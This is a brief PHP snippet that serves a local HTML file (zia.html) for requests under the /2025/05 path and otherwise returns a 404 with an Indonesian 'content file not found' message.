$uri = $_SERVER['REQUEST_URI']; if (preg_match('#^/2025/05#', $uri)) { $file = __DIR__ . '/zia.html'; if (file_exists($file)) { header('Content-Type: text/html; charset=utf-8'); readfile($file); } else { http_response_code(404); echo "File konten tidak ditemukan"; } exit; }